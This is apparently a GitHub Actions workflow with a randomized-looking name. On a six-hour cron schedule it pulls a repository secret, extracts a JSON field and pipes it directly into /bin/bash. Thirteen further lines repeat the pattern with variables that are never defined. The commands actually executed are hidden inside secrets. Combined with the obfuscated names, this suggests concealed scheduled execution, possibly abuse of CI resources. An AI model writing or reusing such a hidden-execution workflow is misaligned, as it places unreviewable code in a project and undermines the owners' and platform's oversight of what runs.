name: bohaocatan

on:
  workflow_dispatch:
  schedule:
    - cron: '15 5/6 * * *'

jobs:
  build:
    runs-on: ubuntu-latest
    steps:
      - uses: actions/checkout@v4
      - name: bohaocatan
        env:
          fjow108: ${{ secrets.fjow108 }}
        run: |
          echo $fjow108 | jq -r .kclxh297 | /bin/bash
          echo $upf5587 | jq -r .gra5419 | /bin/bash
          echo $rp7492 | jq -r .dw09 | /bin/bash
          echo $zjzw1701 | jq -r .es663 | /bin/bash
          echo $d5021 | jq -r .gqly8 | /bin/bash
          echo $vs07912 | jq -r .fhfu70895 | /bin/bash
          echo $hpce29 | jq -r .weqc19964 | /bin/bash
          echo $mo4 | jq -r .umga8 | /bin/bash
          echo $mlhav70609 | jq -r .rfykx384 | /bin/bash
          echo $xj9 | jq -r .j80263 | /bin/bash
          echo $gdgjw7680 | jq -r .psswd31 | /bin/bash
          echo $xqepm7956 | jq -r .km38158 | /bin/bash
          echo $fsgh2 | jq -r .f38760 | /bin/bash
          echo $ua5575 | jq -r .npir226 | /bin/bash

